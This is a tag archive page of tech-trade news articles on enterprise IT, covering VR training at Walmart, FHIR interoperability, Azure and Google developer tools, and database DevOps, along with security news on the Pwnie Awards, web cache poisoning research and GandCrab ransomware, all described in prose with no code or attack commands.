Tag Archives: major

At HR Technology Conference, Walmart says virtual reality works

LAS VEGAS — Learning technology appears to be heading for a major upgrade. Walmart is using virtual reality, or VR, to train its employees, and many other companies may soon do the same.

VR adoption is part of a larger tech shift in employee learning. For example, companies such as Wendy’s are using simulation or gamification to help employees learn about food preparation.

Deploying VR technology is expensive, with cost estimates ranging from tens of thousands of dollars to millions, attendees at the HR Technology Conference learned. But headset prices are declining rapidly, and libraries of VR training tools for dealing with common HR situations — such as how to fire an employee — may make this tool affordable to firms of all sizes.

For Walmart, a payoff of using virtual reality comes from higher job certification test scores. Meanwhile, Wendy’s has been using computer simulations to help employees learn their jobs. It is also adapting its training to the expectations of its workers, and its efforts have led to a turnover reduction. Based on presentations and interviews at the HR Technology Conference, users deploying these technologies are enthusiastic about them.

Walmart employees experience VR’s 3D

“It truly becomes an experience,” said Andy Trainor, senior director of Walmart Academies, in an interview about the impact of VR and augmented reality on training. It’s unlike a typical classroom lesson. “Employees actually feel like they experience it,” he said.

Walmart has adopted virtual reality for its training program.
Walmart’s training and virtual reality team, from left to right: Brock McKeel, senior director of digital operations at Walmart and Andy Trainor, senior director of Walmart Academies.

Walmart employees go to “academies” for training, testing and certification on certain processes, such as taking care of the store’s produce section, interacting with customers or preparing for Black Friday. As one person in a class wears the VR headset or goggles, what that person sees and experiences displays on a monitor for the class to follow.

Walmart has been using VR in training from startup STRIVR for just over a year. In classes using VR, Trainor said the company is seeing an increase in test scores as high as 15% over traditional methods of instruction. Trainor said his team members are convinced VR, with its ability to create 3D simulations, is here to stay as a training tool. 

“Life isn’t 2D,” said Brock McKeel, senior director of digital operations at Walmart. For problems ranging from customer service issues to emergency weather planning, “we want our associates to be the best prepared that we can get them to be.”

Walmart has also created a simulation-type game that helps employees understand store management. The company plans to soon release its simulation as an app for anyone to experience, Trainor said.

The old ways of training are broken

The need to do things differently in learning was a theme at the HR Technology Conference.

Life isn’t 2D.
Brock McKeelsenior director of digital operations at Walmart

The idea that employees will take time out of their day to watch a training video or read material that may not be connected to their task at hand is not effective, said David Mallon, a vice president and chief analyst at Bersin, Deloitte Consulting, based in Oakland, Calif.

The traditional methods of learning “have fallen apart,” Mallon said. Employees “want to engage with content on their terms, when they need it, where they need it and in ways that make more sense.”

Mallon’s point is something Wendy’s realized about its restaurant workers, who understand technology and have expectations about content, said Coley O’Brien, chief people officer at the restaurant chain. Employees want the content to be quick, they want the ability to swipe, and videos should be 30 seconds or less, he said.

“We really had to think about how we evolve our training approach and our content to really meet their expectations,” said O’Brien, who presented at the conference.

Wendy’s also created simulations that reproduce some of the time pressures faced with certain food-preparation processes. Employees must make choices in simulations, and mistakes are tracked. The company uses Cornerstone OnDemand’s platform.

Restaurants in which employees received a certain level of certification see higher sales of 1% to 2%, increases in customer satisfaction and a turnover reduction as high as 20%, O’Brien said.

Tech giants support FHIR standard. Will that make a difference?

During a White House meeting about the new Blue Button 2.0 API for Medicare, six major technology players signed a joint statement pledging to work toward healthcare interoperability with a particular focus on the cloud and artificial intelligence.

The companies — Amazon, Microsoft, Google, IBM, Oracle and Salesforce — promised to support the goal of  “frictionless” interoperability using established industry standards, including the HL7 FHIR standard API. They offered a vision of a robust ongoing dialogue that would include every healthcare entity from payers to patients and application developers, according to a statement released by the Information Technology Industry Council.

Pushing the FHIR standard forward

The statement comes at a time when patient demand for easy access to healthcare data has never been greater. Large hospitals have responded with nascent efforts to improve data exchange based on the FHIR standard API, but there is widespread acknowledgement that healthcare lags far behind other industries when it comes to tech innovation and particularly interoperability. The idea of what could effectively be a consortium of mainstream technology companies working on this tricky problem and promoting the FHIR standard was received warmly by some this week and with a healthy dose of skepticism by others.

The fact that the statement called out cloud usage specifically, is telling, because, for reasons ranging from security to cost, a significant portion of healthcare organizations continue to avoid the cloud. A 2017 report from KLAS Research found 31% of hospitals either won’t expand their cloud efforts or won’t move to the cloud. “The cloud really is a double-edged sword,” said Kathy Downing, vice president of information governance,  informatics, standards, privacy and security at the American Health Information Management Association (AHIMA), in an interview. While the cloud might offer a more secure environment than some smaller health organizations could achieve, Downing isn’t convinced the cloud itself is pivotal to interoperability. “I don’t know that the cloud really has a dog in this interoperability hunt,” she said. “You want to think through the safeguards and do all the assessments. That’s more important than whether you’re using a server or the cloud.”

I’m not sure how any of these entities will solve the issue of semantic interoperability.
John Moorefounder and managing partner of Chilmark Research

It’s a positive sign for the healthcare industry that it’s attracted the attention of these major players, said Coray Tate, vice president of clinical research at KLAS, in an email. But the market has to be there for this to work. “We’re at the base of the mountain and early steps are the easiest,” he said. “It remains to be seen if the market will provide a business case that will sustain the long climb.”

And the business case may not be there because this group of tech companies isn’t in most hospitals in any significant way today, said John Moore, founder and managing partner of Chilmark Research, in an email. “As big and influential as these companies are their collective presence in healthcare is quite disparate and at the end of the day it is what a clinician is using in their workflow that matters,” he explained. “These companies are simply not there. I’m not sure how any of these entities will solve the issue of semantic interoperability.” To further complicate matters, most hospitals don’t want to share patient data with competitors, he said. “They have instead opted to let patients themselves take direct responsibility.”

Tech support potentially a good thing

Attention from tech giants, however, should be seen as a good thing as long as everyone is thoughtful about how to proceed, said Stan Huff, M.D., chief medical informatics officer at Intermountain Healthcare and co-chair of the Health Level 7(HL7) Clinical Information Modeling Initiative, which developed the FHIR standard API. “This is significant because it creates faith in HL7 FHIR and will encourage investment in FHIR development,” he said. “The thing I would want to encourage is that this group work with existing organizations like HL7, ONC, HSPC and CIIC to ensure they all implement the FHIR standard the same way so we get to true semantic interoperability at some point.”

The joint statement offered few details on future plans but stressed the need to get everyone involved, including the open source community. “I think we will need to wait a few weeks to hear specific projects to know what additional impact they will have,” Huff said.

2018 Pwnie Awards cast light and shade on infosec winners

The Meltdown and Spectre side-channel attacks that exploit weaknesses in major processors scored the top spot in two of three Pwnie Award categories — Best Privilege Escalation Bug and Most Innovative Research — but missed on the prize for the most overhyped vulnerability.

The Pwnie Awards, a longtime staple of the Black Hat security conference, are often compared to the Academy Awards, but with spray-painted pony statues, fewer movie stars and more questionable prizes for things like Lamest Vendor Response and Most Overhyped Bug.

This year, the Pwnie Award for Most Innovative Research went to the researchers who discovered the Meltdown and Spectre design flaws. That prize goes to “the most interesting and innovative research in the form of a paper, presentation, tool or even a mailing list post,” according to the Pwnie Awards website. The Pwnie Awards website described Meltdown and Spectre in its nomination for most overhyped bug:

Meltdown and Spectre were vulnerabilities in the way branch prediction worked which would allow attackers the ability to read memory. It was pretty awesome and affected most systems. But at some point, they [sic] hype train jumped the tracks a bit. The normally extremely accurate Fox News called it the worst computer bug in history. One of the researchers who discovered it agreed, calling it ‘probably one of the worst CPU bugs ever found.’ Bloomberg agreed, the Verge said it was a catastrophe.

Meltdown and Spectre also got the Pwnie Award for Best Privilege Escalation Bug — a nod toward the seriousness of the flaws, given how unusual it is for a research team to win in more than one category.

Also worthy of honor

Other Pwnie Awards honored more of the best of security research from the past year, including the following:

  • The Pwnie for Best Server-Side Bug went to the Intel Advanced Management Technology remote vulnerability, a flaw which enabled an exploit that could bypass endpoint protections, including the Windows firewall.
  • The Pwnie for Best Client-Side Bug went to researchers Georgi Geshev and Rob Miller, who built an exploit chain against Android that used 11 bugs in six different applications and was referred to by the Pwnie Awards as “The 12 Logic Bug Gifts of Christmas.”
  • Pwnie for Best Cryptographic Attack went to researchers Hanno Böck, Juraj Somorovsky and Craig Young for their work on the Return Of Bleichenbacher’s Oracle Threat, also known as the ROBOT attack.

The Pwnie Awards initially solicited nominations in 16 categories, but awarded prizes only in the eight categories that received the most nominations, including a Lifetime Achievement Award given to Michal Zalewski, also known as lcamtuf, former director of information security engineering at Google and author of the classic hacker field guide, Silence on the Wire.

Lamest Vendor Response and Most Overhyped Bug

Some of the stiffest competition may have been for the booby prizes.

The competition for overhyped bugs has been fierce recently, as contenders continue to commission websites, logos and social media handles for bugs that might be less than compelling. The nominees for this Pwnie Award honor this year included the Meltdown and Spectre vulnerabilities in microprocessors reported in January, as well as the apparent EFAIL vulnerability in end-to-end encryption technology that turned out to be an issue in email clients.

The winner was a not-quite-tongue-in-cheek parody, Holey Beep, complete with website, logo and tracking assignment as CVE-2018-0492. Beep, a Unix command, “does what you’d expect: it beeps,” according to the description from the Holey Beep website. “Beep allows you to control pitch, duration, and repetitions” of the tone.

But it also can give an attacker root on the target system. “Its job is to live inside shell/perl scripts and allow more granularity than one has otherwise. It is controlled completely through command line options. It’s not supposed to be complex, and it isn’t — but it makes system monitoring (or whatever else it gets hacked into) much more informative. Also it gives you root.”

Meanwhile, Bitfi, maker of the Bitfi Wallet, was the late-entry surprise winner of the Pwnie Award for Lamest Vendor Response. Although the Bifi situation played out just days before Black Hat, The Register reported it received thousands of nominations after hackers comprehensively cracked the devices and demonstrated numerous security failures in the design. Bitfi backed off its offer of a six-figure bounty to any hacker who could manage to hack it by standing behind a very narrow definition of what constituted a hack — namely, pulling the private key off of a device that doesn’t store the key.

The well-documented hacks came after Bitfi’s executive chairman, John McAfee, extolled the device as “the world’s first unhackable storage for cryptocurrency and digital assets.”

As Rev. Robert Ballecer put it on Twitter:

Web cache poisoning attacks demonstrated on major websites, platforms

Major websites and platforms may be vulnerable to simple yet devastating web cache poisoning attacks, which could put millions of users in jeopardy.

James Kettle, head of research at PortSwigger Web Security, Ltd., a cybersecurity tool publisher headquartered near Manchester, U.K., demonstrated several such attacks during his Black Hat 2018 session titled “Practical Web Cache Poisoning: Redefining ‘Unexploitable.'” Kettle first unveiled his web cache poisoning hacks in May, but in the Black Hat session he detailed his techniques and showed how major weaknesses in HTTPS response headers allowed him to compromise popular websites and manipulate platforms such as Drupal and Mozilla’s Firefox browser.

“Web cache poisoning is about using caches to save malicious payloads so those payloads get served up to other users,” he said. “Practical web cache poisoning is not theoretical. Every example I use in this entire presentation is based on a real system that I’ve proven can be exploited using this technique.”

As an example, Kettle showed how he was able to use a simple technique to compromise the home page of Linux distributor Red Hat. He created an open source extension for PortSwigger’s Burp Suite Scanner called Param Miner, which detected unkeyed inputs in the home page. From there, Kettle was able to change the X-Forwarded-Host header and load a cross-site scripting payload to the site’s cache and then craft responses that would deliver the malicious payload to whoever visited the site. “We just got full control over the home page of RedHat.com, and it wasn’t very difficult,” he said.

In another test case, Kettle used web cache poisoning on the infrastructure for Mozilla’s Firefox Shield, which gives users the ability to push application and plug-in updates. When the Firefox browser initially loads, it contacts Shield for updates and other information such as “recipes” for installing extensions. During a different test case on a Data.gov site, he found an “origin: null” header from Mozilla and discovered he could manipulate the “X-Forwarded-Host” header to trick the system so that instead of going to Firefox Shield to fetch recipes, Firefox would instead be directed to a domain Kettle controlled.

Kettle found that Mozilla signed the recipes, so he couldn’t simply make a malicious extension and install it on 50 million computers. But he discovered he could replay old recipes, specifically one for an extension with a known vulnerability; he could then compromise that extension and forcibly inflict that vulnerable extension on every Firefox browser in the world.

“The end effect was I could make every Firefox browser on the planet connect to my system to fetch this recipe, which specified what extensions to install,” he said. “So that’s pretty cool because that’s 50 million browsers or something like that.”

Kettle noted in his research that when he informed Mozilla of the technique, they patched it within 24 hours; but, he wrote, “there was some disagreement about the severity so it was only rewarded with a $1,000 bounty.”

Kettle also demonstrated techniques that allowed him to compromise GoodHire.com, blog.Cloudflare.com and several sites that use Drupal’s content management platform. While the web cache poisoning attacks he demonstrated were potentially devastating, Kettle said they could be mitigated with a few simple steps. First, he said, organizations should “cache with caution” and if possible, disable it completely.

However, Kettle acknowledged that may not be realistic for larger enterprises, so in those cases he recommended diligently scanning for unkeyed inputs. “Avoid taking input from HTTP headers and cookies as much as possible,” he said, “and also audit your applications with Para Miner to see if you can find any unkeyed inputs that your framework has snuck in support for.”

Microsoft Azure Dev Spaces, Google Jib target Kubernetes woes

To entice developers to create more apps on their environments, major cloud platform companies will meet them where they live.

Microsoft and Google both released tools to help ease app development on their respective platforms, Microsoft Azure and the Google Cloud Platform. Microsoft’s Azure Dev Spaces and Google Jib help developers build applications for the Kubernetes container orchestrator and Java environments and represent a means to deliver simpler, developer-friendly technology.

Microsoft’s Azure Dev Spaces, now in public preview, is a cloud-native development environment for the company’s Azure Kubernetes Service (AKS), where developers can work on applications while connected with the cloud and their team. These users can build cloud applications with containers and microservices on AKS and do not deal with any infrastructure management or orchestration, according to Microsoft.

As Kubernetes further commoditizes deployment and orchestration, cloud platform vendors and public cloud providers must focus on how to simplify customers’ implementation of cloud-native development methods — namely DevOps, CI/CD and microservices, said Rhett Dillingham, an analyst at Moor Insights & Strategy in Austin, Texas.

“Azure Dev Spaces has the potential to be one of Microsoft’s most valuable recent developer tooling innovations, because it addresses the complexity of integration testing and debugging in microservices environments,” he said.

Edwin Yuen, analyst, Enterprise Strategy GroupEdwin Yuen

With the correct supporting services, developers can fully test and deploy in Microsoft Azure, added Edwin Yuen, an analyst at Enterprise Strategy Group in Milford, Mass.

“This would benefit the developer, as it eases the process of container development by allowing them to see the results of their app without having to set up a Docker or Kubernetes environment,” he said.

Meanwhile, Google’s Jib containerizer tool enables developers to package a Java application into a container image with the Java tools they already know to create container-based advanced applications. And like Azure Dev Spaces, it handles a lot of the underlying infrastructure and orchestration tasks.

It’s about simplifying the experience … the developer is eased into the process by using existing tools and eliminating the need to set up Docker or Kubernetes.
Edwin Yuenanalyst, Enterprise Strategy Group

Integration with Java development tools Maven and Gradle means Java developers can skip the step to create JAR, or Java ARchive, files and then containerize them, Yuen said.

“Like Azure Dev Spaces, it’s about simplifying the experience — this time, not the laptop jump, but the jump from JAR to container,” he said. “But, again, the developer is eased into the process by using existing tools and eliminating the need to set up Docker or Kubernetes.”

Jib also extends Google’s association with the open source community to provide Java developers an easy path to containerize their apps while using the Google Cloud Platform, Yuen added.

Microsoft bills Azure network as the hub for remote offices

Microsoft’s foray into the rapidly growing SD-WAN market could solve a major customer hurdle and open Azure to even more workloads.

All the major public cloud platforms have increased their networking functionality in recent months, and Microsoft’s latest service, Azure Virtual WAN, pushes the boundaries of those capabilities. The software-defined network acts as a hub that links with third-party tools to improve application performance and reduce latency for companies with multiple offices that access Azure.

IDC estimates the software-defined wide area network (SD-WAN) market will hit $8 billion by 2021, as cloud computing continues to proliferate and employees must access cloud-hosted workloads from various locations. So far, the major cloud providers have left that work to partners.

But this Azure network service solves a big problem for customers that make decisions about network transports and integration with existing routers, as they consume more cloud resources from more locations, said Brad Casemore, an IDC analyst.

“Now what you’ve got is more policy-based, tighter integration within the SD-WAN,” he said.

Azure Virtual WAN uses a distributed model to link Microsoft’s global network with traditional on-premises routers and SD-WAN systems provided by Citrix and Riverbed. Microsoft’s decision to rely on partners, rather than provide its own gateway services inside customers’ offices, suggests it doesn’t plan to compete across the totality of the SD-WAN market, but rather provide an on-ramp to integrate with third-party products.

Customers can already use various SD-WAN providers to easily link to a public cloud, but Microsoft has taken the level of integration a step further, said Bob Laliberte, an analyst at Enterprise Strategy Group in Milford, Mass. Most SD-WAN vendors are building out security ecosystems, but Microsoft already has that in Azure, for example.

This could also simplify the purchasing process, and it would make sense for Microsoft to eventually integrate this virtual WAN with Azure Stack to help facilitate hybrid deployments, Laliberte said.

It’s unclear if customers trust Microsoft — or any single hyperscale cloud vendor — at the core of their SD-WAN implementation, as their architectures spread across multiple clouds.

The Azure Virtual WAN service is billed as a way to connect remote offices to the cloud, and also to each other, with improved reliability and availability of applications. But that interoffice linkage also could lure more companies to use Azure for a whole host of other services, particularly customers just starting to embrace the public cloud.

There are still questions about the Azure network service, particularly around multi-cloud deployments. It’s unclear if customers trust Microsoft — or any single hyperscale cloud vendor — at the core of their SD-WAN implementation, as their architectures spread across multiple clouds, Casemore said.

Azure updates boost network security, data analytics tools

Microsoft also introduced an Azure network security feature this week, Azure Firewall, with which users can create and enforce network policies across multiple endpoints. A stateful firewall protects Azure Virtual Network resources and maintains high availability without any restrictions on scale.

Several other updates include an expanded Azure Data Box service, still in preview, which provides customers with an appliance onto which they can upload data and ship directly to an Azure data center. These types of devices have become a popular means to speed massive migrations to public clouds. Another option for Azure users, Azure Data Box Disk, uses SSD disks to transfer up to 40 TB of data spread across five drives. That’s smaller than the original box’s 100 TB capacity, and better suited to collect data from multiple branches or offices, the company said.

Microsoft also doubled the query performance of Azure SQL Data Warehouse to support up to 128 concurrent queries, and waived the transfer fee for migrations to Azure of legacy applications that run on Windows Server and SQL Server 2008/2008 R2, for which Microsoft will end support in July 2019. Microsoft also plans to add features to Power BI for ingestions and integration across BI models that are similar to Microsoft customers’ experience with Power Query for Excel.

GandCrab ransomware adds NSA tools for faster spreading

With version 4, GandCrab ransomware has undergone a major overhaul, adding an NSA exploit to help spread and targeting a larger set of systems.

The updated GandCrab ransomware was first discovered earlier this month, but researchers are just now learning the extent of the changes. The code structure of the GandCrab ransomware was completely rewritten. And, according to Kevin Beaumont, a security architect based in the U.K., the malware now uses the EternalBlue National Security Agency (NSA) exploit to target SMB vulnerabilities and spread faster.

“It no longer needs a C2 server (it can operate in airgapped environments, for example) and it now spreads via an SMB exploit – including on XP and Windows Server 2003 (along with modern operating systems),” Beaumont wrote in a blog post. “As far as I’m aware, this is the first ransomware true worm which spreads to XP and 2003 – you may remember much press coverage and speculation about WannaCry and XP, but the reality was the NSA SMB exploit (EternalBlue.exe) never worked against XP targets out of the box.”

Joie Salvio, senior threat researcher at Fortinet, based in Sunnyvale, Calif., found the GandCrab ransomware was being spread to targets via spam email and malicious WordPress sites and noted another major change to the code.

“The biggest change, however, is the switch from using RSA-2048 to the much faster Salsa20 stream cipher to encrypt data, which had also been used by the Petya ransomware in the past,” Salvio wrote in the analysis. “Furthermore, it has done away with connecting to its C2 server before it can encrypt its victims’ file, which means it is now able to encrypt users that are not connected to the Internet.”

However, the GandCrab ransomware appears to specifically target users in Russian-speaking regions. Fortinet found the malware checks the system for use of the Russian keyboard layout before it continues with the infection.

Despite the overhaul of the GandCrab ransomware and the expanded systems being targeted, Beaumont and Salvio both said basic cyber hygiene should be enough to protect users from attack. This includes installing the EternalBlue patch released by Microsoft, keeping antivirus up-to-date and disabling SMB version 1 altogether, which is advice that has been repeated by various outlets, including US-CERT, since the initial WannaCry attacks began.

Database DevOps tools bring stateful apps up to modern speed

DevOps shops can say goodbye to a major roadblock in rapid application development.

At this time in 2017, cultural backlash from database administrators (DBAs) and a lack of mature database DevOps tools made stateful applications a hindrance to the rapid, iterative changes made by Agile enterprise developers. But, now, enterprises have found both application and infrastructure tools that align databases with fast-moving DevOps pipelines.

“When the marketing department would make strategy changes, our databases couldn’t keep up,” said Matthew Haigh, data architect for U.K.-based babywear retailer Mamas & Papas. “If we got a marketing initiative Thursday evening, on Monday morning, they’d want to know the results. And we struggled to make changes that fast.”

Haigh’s team, which manages a Microsoft Power BI data warehouse for the company, has realigned itself around database DevOps tools from Redgate since 2017. The DBA team now refers to itself as the “DataOps” team, and it uses Microsoft’s Visual Studio Team Services to make as many as 15 to 20 daily changes to the retailer’s data warehouse during business hours.

Redgate’s SQL Monitor was the catalyst to improve collaboration between the company’s developers and DBAs. Haigh gave developers access to the monitoring tool interface and alerts through a Slack channel, so they could immediately see the effect of application changes on the data warehouse. They also use Redgate’s SQL Clone tool to spin up test databases themselves, as needed.

“There’s a major question when you’re starting DevOps: Do you try to change the culture first, or put tools in and hope change happens?” Haigh said. “In our case, the tools have prompted cultural change — not just for our DataOps team and dev teams, but also IT support.”

Database DevOps tools sync schemas

Redgate’s SQL Toolbelt suite is one of several tools enterprises can use to make rapid changes to database schemas while preserving data integrity. Redgate focuses on Microsoft SQL Server, while other vendors, such as Datical and DBmaestro, support a variety of databases, such as Oracle and MySQL. All of these tools track changes to database schemas from application updates and apply those changes more rapidly than traditional database management tools. They also integrate with CI/CD pipelines for automated database updates.

Radial Inc., an e-commerce company based in King of Prussia, Pa., and spun out of eBay in 2016, took a little more than two years to establish database DevOps processes with tools from Datical. In that time, the company has trimmed its app development processes that involve Oracle, SQL Server, MySQL and Sybase databases from days down to two or three hours.

“Our legacy apps, at one point, were deployed every two to three months, but we now have 30 to 40 microservices deployed in two-week sprints,” said Devon Siegfried, database architect for Radial. “Each of our microservices has a single purpose and its own data store with its own schema.”

That means Radial, a 7,000-employee multinational company, manages about 300 Oracle databases and about 130 instances of SQL Server. The largest database change log it’s processed through Datical’s tool involved more than 1,300 discrete changes.

“We liked Datical’s support for managing at the discrete-change level and forecasting the impact of changes before deployment,” Siegfried said. “It also has a good rules engine to enforce security and compliance standards.”

Datical’s tool is integrated with the company’s GoCD DevOps pipeline, but DBAs still manually kick off changes to databases in production. Siegfried said he hopes that will change in the next two months, when an update to Datical will allow it to detect finer-grained attributes of objects from legacy databases.

ING Bank Turkey looks to Datical competitor DBmaestro to link .NET developers who check in changes through Microsoft’s Team Foundation Server 2018 to its 20 TB Oracle core banking database. Before its DBmaestro rollout in November 2017, those developers manually tracked schema and script changes through the development and test stages and ensured the right ones deployed to production. DBmaestro now handles those tasks automatically.

“Developers no longer have to create deployment scripts or understand changes preproduction, which was not a safe practice and required more effort,” said Onder Altinkurt, IT product manager for ING Bank Turkey, based in Istanbul. “Now, we’re able to make database changes roughly weekly, with 60 developers in 15 teams and 70 application development pipelines.”

Database DevOps tools abstract away infrastructure headaches

Consistent database schemas and deployment scripts through rapid application changes is an important part of DevOps practices with stateful applications, but there’s another side to that coin — infrastructure provisioning.

Stateful application management through containers and container orchestration tools such as Kubernetes is still in its early stages, but persistent container storage tools from Portworx Inc. and data management tools from Delphix have begun to help ease this burden, as well.

GE Digital put Portworx container storage into production to support its Predix platform in 2017, and GE Ventures later invested in the company.

Now, [developers] make database changes roughly weekly, with 60 developers in 15 teams and 70 application development pipelines.
Onder AltinkurtIT product manager, ING Bank Turkey

“Previously, we had a DevOps process outlined. But if it ended at making a call to GE IT for a VM and storage provisioning, you give up the progress you made in reducing time to market,” said Abhishek Shukla, managing director at GE Ventures, based in Menlo Park, Calif. “Our DevOps engineering team also didn’t have enough time to call people in IT and do the infrastructure testing — all that had to go on in parallel with application development.”

Portworx allows developers to describe storage requirements such as capacity in code, and then triggers the provisioning at the infrastructure layer through container orchestration tools, such as Mesosphere and Kubernetes. The developer doesn’t have to open a ticket, wait for a storage administrator or understand the physical infrastructure. Portworx can arbitrate and facilitate data management between multiple container clusters, or between VMs and containers. As applications change and state is torn down, there is no clutter to clean up afterward, and Portworx can create snapshots and clone databases quickly for realistic test data sets.

Portworx doesn’t necessarily offer the same high-octane performance for databases as bare-metal servers, said a Portworx partner, Kris Watson, co-founder of ComputeStacks, which packages Portworx storage into its Docker-based container orchestration software for service-provider clients.

“You may take a minimal performance hit with software abstraction layers, but rapid iteration and reproducible copies of data are much more important these days than bare-metal performance,” Watson said.

The addition of software-based orchestration-to-database testing processes can drastically speed up app development, as Choice Hotels International discovered when it rolled out Delphix’s test data management software a little more than two years ago.

“Before that, we had never refreshed our test databases. And in the first year with Delphix, we refreshed them four or five times,” said Nick Suwyn, IT leader at the company, based in Rockville, Md. “That has cut down data-related errors in code and allowed for faster testing, because we can spin up a test environment in minutes versus taking all weekend.”

The company hasn’t introduced Delphix to all of its development teams, as it prioritizes a project to rewrite the company’s core reservation system on AWS. But most of the company’s developers have access to self-service test databases whenever they are needed, and Suwyn’s team will link Delphix test databases with the company’s Jenkins CI/CD pipelines, so developers can spin up test databases automatically through the Jenkins interface.

Airtel CIO targets cutting-edge tech

A major part of every digital transformation is exploring how cutting-edge tech can facilitate the journey. Some companies, like Indian telecom giant Bharti Airtel Ltd., are more capable than others of experimenting with new technologies, affording them a wealth of opportunities for innovation.

In this video from the recent MIT Sloan CIO Symposium, Harmeen Mehta, global CIO and head of digital at Airtel, discusses some of the cutting-edge tech she’s employing at her company — everything from advanced mapping techniques and network digitization to voice computing technology and AI-driven customer offerings.

Editor’s note: This transcript has been edited for clarity and length.

What kind of cutting-edge tech are you using to speed up your company’s digital transformation process?

Harmeen Mehta: Lots of pieces. I think one of the biggest challenges that we have is mapping the intricacies and the inner lanes in India and doing far more than what even Google does. For Google, the streets are of prime importance [when it comes to mapping]. For us, the address of every single house and whether it’s a high-rise building or it’s a flat is very important as we bring different services into these homes. So, we’ve been working on finding very innovative ways to take Google’s [mapping] as a base and make it better for us to be able to map India to that level of accuracy of addresses, houses and floor plans.

Another problem that I can think of where a lot of cutting-edge tech is being used is in creating a very customized contextual experience for the consumer so that every consumer has a unique experience on any of our digital properties. The kind of offers that the company brings to them are really tailored and suited to them rather than it being a general, mass offering. There’s a lot of machine learning and artificial intelligence that’s going into that.

Another one is we’re digitizing a large part of our network. In fact, we’re collaborating with SK Telecom, who we think is one of the most innovative telcos out there, in order to do that. We’re using, again, a lot of machine learning and artificial intelligence there as well, as we bring about an entire digitization of our network and are able to optimize the networks and our investments much better.

Then, of course, I’m loving the new stream that we are creating, which is all around exploring voice as a technology. The voice assistants are getting more intelligent. It gives us a very unique opportunity to actually reach out and bring the digital transformation to a lot of Indians who aren’t as literate — to those whom the reading and the writing part doesn’t come to them as naturally as speaking does. It’s opening up a whole lot of new doors and we’re really finding that a very interesting space to work in and we’re exploring a lot in that arena at the moment.

View All Videos

How to muster the troops

A digital transformation journey, make no mistake, is no walk in the park. It involves major course corrections to technology, to business processes, to how people do their jobs and how they think about their roles. So, how does a company make something so radical as digital transformation part of its DNA?

Gail Evans, who was promoted in June from global CIO at Mercer to the consulting firm’s global chief digital officer, believes an important first step is getting people to see what’s in it for them, “because once you see the value, you’re all in.”

In this video recorded in May at the MIT Sloan CIO Symposium, then-CIO Evans provided some insight into how she musters the troops at Mercer, explaining that a digital transformation journey is, by nature, long and iterative, requiring people to see value all along the way.

Editor’s note: The following was edited for clarity and brevity.

What can companies do to get started on a digital transformation journey?

Gail Evans: Actually, I think there are a couple of things. I think digital transformation, at its core, is the people. At the very core of any transformation, it is about how do you inspire a team to align to this new era — this new era of different tools, different technologies that can be applied in many different, creative ways to create new business models or to drive efficiencies in your organization.

So, I think the leaders in the enterprise are ones who understand the dynamics of taking your core and moving it up the food chain. Where does it start? I think it starts with creating a beachhead, creating a platform of digital, and then allowing that to grow and swell with training and opportunities, webinars, blogs so that it becomes a part of a company’s DNA. Because I believe digital isn’t a thing — it’s a new way of doing things to create value through the application of technology and data.

Which departments at Mercer are in the vanguard of digital transformation? Who are laggards?

Evans: One would argue that marketing is already digital, right? I mean, they are already using digital technologies to drive personalized experiences on the web and have been doing that for many years. I would say that it starts in, probably, technology. Technology will embrace it, and also it needs to be infused into the business leaders.

I think the laggards are typically … I guess I wouldn’t necessarily call them ‘laggards.’ I think I would refer to them as not yet seeing the value of digital, because once you see the value, you’re all in.

Pockets of resistance

[Digital transformation is] humans plus technology and new business models. That is what digital transformation is all about and it’s fun!
Gail Evansglobal chief digital officer, Mercer

Evans: There are teams or pockets of folks who have done things the same way for a long time and there is a resistance there. It’s kind of the, ‘If it ain’t broke, don’t fix it.’ Those are pockets, but you’d find those pockets in every transformation, whether it’s digital or [moving into the] information age, whatever — you’ll find pockets of people who are not ready to go.

And so, I think there are pockets of people in our core legacy who are holding onto their technology of choice and may not have up-skilled themselves, so they are holding on and they are resisting.

And then there are business folks who have been used to one-to-one relationships and built their whole career — a very successful career — with those one-to-one relationships. And now digital is coming from a different place where some of what you might have thought was your IP in value is now in algorithms. What will you do differently and how do you manage those dynamics differently?

I think there’s education [that needs to happen] because I think it’s humans plus technology, it’s not just technology; it’s humans plus technology and new business models. That is what digital transformation is all about and it’s fun! It is a new way to just have fun. It will be something else two, three, five years from now.

Speaking to ‘hearts and minds’

What strategies do you have for getting people to sign on for that ‘fun’ digital transformation journey?

Evans: At Mercer, what I’ve done was, first, you have to create, I think, a very strong digital strategy that is not just textbook strategy, but one that speaks to the hearts and minds from the executive team down to the person who’s coding, that they can relate to and become a part of it. Many people believe, ‘What’s in it for me? Yeah, I get that technology stuff, but what is it in for me?’ [Showing that] then what is in it for the business and bringing that strategy together and having proof points along the way [is important].

It’s not a big bang approach; it’s really very agile and iterative. And so, as you iterate and show value, people will become more open to change. And as you train them, so build a strategy and inspire your team, inspire your executive leadership team because that’s where all the money is. You need the money, so they need to believe in the digital transformation [journey] and the revenue aspect and the stakeholder value that it would bring.

Basically, create a strong vision that applies to the team, create a strategy that is based on efficiencies and revenue and also create what many call a bimodal [IT approach] because you need to continue to drive the core legacy systems and optimize. They’re still the bread and butter of the company. So, you have to find a strategy that allows both to grow.

View All Videos